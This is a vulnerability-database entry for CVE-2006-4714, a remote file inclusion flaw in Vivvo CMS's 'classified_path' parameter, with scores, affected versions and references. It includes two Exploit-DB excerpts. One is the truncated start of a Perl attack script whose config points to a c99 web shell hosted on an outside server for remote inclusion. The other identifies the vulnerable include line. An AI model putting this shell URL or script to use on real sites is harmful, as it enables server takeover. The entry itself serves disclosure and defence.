CVE-2006-4714
Published 2006-09-12
Priority P333, medium, 5.1 (CVSS 2.0), vector AV:N/AC:H/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS 3.39% (87.3th percentile)
PHP remote file inclusion vulnerability in index.php in SpoonLabs Vivvo Article Management CMS (aka phpWordPress) 3.2 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the classified_path parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| spoonlabs | vivvo_article_management_cms | <= 3.25 | — |
| spoonlabs | vivvo_article_management_cms | — | — |
No detection rules found.
Exploit-DB
Vivvo CMS 3.4 - Multiple Vulnerabilities
exploitdb · 2008-10-19 · CVE-2007-3939
---
#!/usr/bin/perl
#Vivvo CMS Destroyer
#[email protected]
#By Xianur0
#-------------CREDITS-------------
#http://milw0rm.com/exploits/4192
#http://milw0rm.com/exploits/3326
#http://milw0rm.com/exploits/2339
#http://milw0rm.com/exploits/2337
#-------------/CREDITS-------------
print "\n Vivvo CMS Destroyer By Xianur0\n";
#-----------CONFIG----------
$SHELL='http://y4m15p33dy.vilabol.uol.com.br/c99.txt';
$textshell = 'C99Shell v.';
#----------/CONFIG----------
use LWP::UserAgent;
use Switch;
my $path = $ARGV[0];
$path = shift || &uso;
sub uso { print "\nUse: vivvo.pl [URI to Vivvo CMS]\n"; exit;}
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17");
$req = HTTP::Request->
Exploit-DB
Vivvo Article Manager 3.2 - 'classified_path' File Inclusion
exploitdb · 2006-09-09 · CVE-2006-4714
---
#########################################################################
#MercilessTurk [email protected]
#########################################################################
#App Name: phpWordPress (Vivvo Article Manager)
#App Author: vivvo.net
#App Version: <=3.2
#########################################################################
#Vulnerable Code in HTML_function.php function HTML_Category_Menu() :
#line 51: include_once($classified_path.'export_category.php');
#if register_globals = On then this code can include $_GET['classified_path']
#in index.php HTML_Category_Menu() function is called:
#line 45:
#$box_sections_HTML=HTML_Category_Menu();
################################################################
No writeups or analysis indexed.
http://secunia.com/advisories/21855
http://securitydot.net/xpl/exploits/vulnerabilities/articles/1467/exploit.html
http://www.securityfocus.com/bid/84147
http://www.vupen.com/english/advisories/2006/3548
https://exchange.xforce.ibmcloud.com/vulnerabilities/28834
https://www.exploit-db.com/exploits/2339